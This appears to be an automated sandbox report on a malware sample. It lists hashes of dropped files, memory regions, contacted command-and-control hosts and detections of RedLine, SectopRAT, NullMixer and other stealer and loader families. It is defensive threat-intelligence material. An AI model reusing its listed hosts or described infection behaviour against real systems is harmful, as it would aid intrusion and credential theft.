memory/3896-57-0x00000000001E0000-0x00000000001E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe

MD5 dd3f5335f760b949760b02aac1187694
SHA1 f53535bb3093caef66890688e6c214bcb4c51ef9
SHA256 90206625829c37a60ab736cfd7a8ff46f89524123b3246eabeaa77a2126bba26
SHA512 e715b69ca632f51c449a415ef831ed0d7e0160af20a3f79b09cb31bdce8920697c30c5f625851e9418bc087145b7b16deea7cc57c159c331350f1c88e7785004

C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\8.exe

MD5 360e4cdd67c04428d4a9b9b59d352584
SHA1 de633409edc357f21da340992cbb035350001254
SHA256 01a005463e33fb90c1b77e0fcee36f5e7856fe6868313df3c1fe123fe4c1e1a8
SHA512 e0c9056943d7e70f5e506696ce9b0236d083fe6cb08fb7511355fac380da3b56fad552789053d58de06b5e980fd38319b865be962b09e1d3f2f46a84ef177084

C:\Users\Admin\AppData\Local\Temp\is-OR5S1.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe

MD5 f7f7ab4f0a4d1c8d127a1c6bb4c0ea6e
SHA1 d7462d88f1fb9904fe3f1e937e2ebc0809607f8a
SHA256 f564d99d0ce406b1ca653ad2d3c40d6d4c6d9304729fd47a22bb6157be6294a6
SHA512 95e156b95132d6a7df5c15ba7f7d0b6d683a16e46c83716090a83a4cf1016f5a9e45ec45026f05287f55596bd669fac5b1873d89779795011ff7bd4484aab7e2

memory/2904-128-0x00007FFC0EC10000-0x00007FFC0F6D1000-memory.dmp

memory/2672-163-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3028-171-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Jonba.exe

MD5 3434b3e59d0dc8d25ff3e83ced5d6f87
SHA1 1cfc6af2e22fc55e8bcbce2cbe0ea572cff11d8f
SHA256 f2201a75165335d71b3f303fb46db6b8e6e160cba924bc02b2409da5c8c83b40
SHA512 6f7850598937f930a6732a1e713ebe47cc716fe9e32a68623378c8143c57da1f51f4af97f6886bce3f48b8a04b0bd540839eee23ca0926f6bf44c2f5af12980a

memory/1992-184-0x0000000000350000-0x0000000000358000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-6NVNL.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\nsu9E36.tmp\INetC.dll

MD5 2b342079303895c50af8040a91f30f71
SHA1 b11335e1cb8356d9c337cb89fe81d669a69de17e
SHA256 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

C:\Users\Admin\AppData\Local\Temp\Chrome4.exe

MD5 89d1bd67214042bde02749afdc91b85f
SHA1 bd3b9b45fecb02a8d38a3f2dab7de14a3e4f8ea4
SHA256 4672ca322e9d03b30223452f9d9be6e78d957ef47fc046fc60a1fffc1edad1e0
SHA512 bacf183ae91cd2f8521f5ff376a2f004b2222738b5ffe2c69d623b33266186ccc7036fb255591af1d3b7f1003376950486e42cb1dc202a60ffd597a7227a15ad

C:\Users\Admin\AppData\Local\Temp\nsu9E36.tmp\System.dll

MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

memory/5048-211-0x00000000031A0000-0x000000000321C000-memory.dmp

memory/2108-145-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4060-116-0x0000000000CE0000-0x0000000000CE8000-memory.dmp

memory/3028-81-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2956-59-0x00000000004E0000-0x000000000052A000-memory.dmp

memory/1200-55-0x0000000000010000-0x000000000005A000-memory.dmp

memory/1200-52-0x0000000000010000-0x000000000005A000-memory.dmp

memory/1200-48-0x0000000000010000-0x000000000005A000-memory.dmp

memory/2904-26-0x0000000002BC0000-0x0000000002BC6000-memory.dmp

memory/2904-15-0x0000000000B50000-0x0000000000B6A000-memory.dmp

memory/2904-13-0x00007FFC0EC13000-0x00007FFC0EC15000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 a301ebde2b21398e796398cd7c973296
SHA1 4e417ba63cde94f776843e1208013b537571e9a8
SHA256 602099bed23abfc1c5f2aea2592a2bc2a7d6c3e911b984e32c16dfc30db1a04f
SHA512 99b8696cc1f1f7a12706cc71fae6601ac64bca2f772e4ffac7972e3529204c75e1dd6f7537f35849ca6b6ec7813c8f633c03dd41fd20d1aa038dcbc17f27ddb4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 67e486b2f148a3fca863728242b6273e
SHA1 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256 facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512 d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 84b7af9d76223783b896008964b883ce
SHA1 d9d89432969372eb5fb7aba6c710de9c67f47245
SHA256 4c3dace7ea81bd11cf97b84357dcfb49533fbfc80f2f0cc3e617491e41722088
SHA512 cd26c958313b158fd146f9dcd79b1fe8aae0c7d2a8220373b35454fd8889e91d8425be98d6d470735996fae8c8848afa92027f86941e8faca1349eb97d317c01

C:\Users\Admin\AppData\Local\Temp\RarSFX1\WcWfz1Tn.MJ

MD5 e1caa9cc3b8bd60f12093059981f3679
SHA1 f35d8b851dc0222ae8294b28bd7dee339cc0589b
SHA256 254b6e6f43b2707ac107664b163ba074051b0534aafa8faf85a1760299182565
SHA512 23f3fa616c1a96acd9a781d833a69ac37a9989dc5605396ecde41beae971b287bc963ea8020c56d92034e7e284c37639280650e1674864707ba859ad5815cdfa

C:\Users\Admin\AppData\Local\Temp\RarSFX1\MyBa.V

MD5 51424c68f5ff16380b95f917c7b78703
SHA1 70aa922f08680c02918c765daf8d0469e5cd9e50
SHA256 065f5b48408abb0260d68775e6db36136c8ac2bd7c8a1168613cc5cb8825d315
SHA512 c7510a9555402d64665bcbce661eb54c1bcbb20095c084036d8af625de9d0bf93cb33e93cbc9b6efbc73f9080ef7052dcbc35fb8d44ccf56fb2db8af933e06af

C:\Users\Admin\AppData\Local\Temp\RarSFX1\1w8lBDVH.aou

MD5 112b8c9fa0419875f26ca7b592155f2b
SHA1 0b407062b6e843801282c2dc0c3749f697a67300
SHA256 95ae984c19dbf91919296efb398aaf700605910a28abe9288c7639c7d9223202
SHA512 a71e187dbc18c2d7cd21b1e856ee7d58e230b801758ed6a2205e8dacdc8235a09111014cff3171ea82e8942251508ada57eefdbcbc13daddbfbe30eddc29dad8

C:\Users\Admin\AppData\Local\Temp\RarSFX1\9Bu~.w

MD5 8b4e06aede42785b01c3cdf3f0883da6
SHA1 664fdc12cb0141ffd68b289eaaf70ae4c5163a5a
SHA256 8a8d67872f0bc6e6669f7396a84b879d12882ea495467b09b6613edfc4108c42
SHA512 7b6a20e41365c546f1aa5a84964b36fc4cedd194754d1f09cfdadf822f4141d037067811ca62a7d2da23ec1e332943cb828d4f771308fdfa79327cb3fb6f2c82

memory/5048-254-0x0000000000400000-0x0000000002F74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\hKS2IU.1Q

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/2008-261-0x0000000002AF0000-0x0000000003AF0000-memory.dmp

memory/1200-262-0x0000000000BB0000-0x0000000000BBC000-memory.dmp

memory/2008-263-0x000000002D8F0000-0x000000002D996000-memory.dmp

memory/2008-267-0x000000002D9A0000-0x000000002DA33000-memory.dmp

memory/2008-264-0x000000002D9A0000-0x000000002DA33000-memory.dmp

memory/2108-268-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3448-269-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2008-270-0x0000000002AF0000-0x0000000003AF0000-memory.dmp

memory/3660-278-0x000001CE77E60000-0x000001CE78080000-memory.dmp

memory/3660-279-0x000001CE7AA80000-0x000001CE7ACA0000-memory.dmp

memory/3660-280-0x000001CE79EE0000-0x000001CE79EF2000-memory.dmp

memory/2008-281-0x000000002D9A0000-0x000000002DA33000-memory.dmp

memory/2008-282-0x000000002DA40000-0x000000002E8A6000-memory.dmp

memory/2008-283-0x000000002E8B0000-0x000000002E93D000-memory.dmp

memory/2008-284-0x000000002E940000-0x000000002E9C8000-memory.dmp

memory/2008-285-0x000000002E940000-0x000000002E9C8000-memory.dmp

memory/2008-287-0x000000002E940000-0x000000002E9C8000-memory.dmp

memory/2008-288-0x0000000000A30000-0x0000000000A33000-memory.dmp

memory/2008-289-0x0000000000A40000-0x0000000000A45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe

MD5 a014b8961283f1e07d7f31ecdd7db62f
SHA1 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065
SHA256 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89
SHA512 bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869

memory/2944-321-0x0000000000F60000-0x0000000000F68000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

MD5 b245679121623b152bea5562c173ba11
SHA1 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA256 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA512 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 816520bddbb9cd95a5904ba5c6626989
SHA1 d6aca0489429c82eab0f5e213f1ca93648a36eb2
SHA256 8877b12798309300f6f18ac44e2c4770076c152b5ba36f17b8bf94338adc178a
SHA512 2db4fb133d24d8cd8905c42e8affab1efd322efa740ba8381de4a0f610a2492a78dfc42761d85d7df13334938da7ddd0fe95a6066ff3d40f03c2f71f2f5660c3

memory/4556-336-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4556-339-0x0000000002E20000-0x0000000002E40000-memory.dmp

memory/4556-338-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4556-341-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4556-340-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3468-357-0x000002579D180000-0x000002579D186000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06384ea2548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe N/A
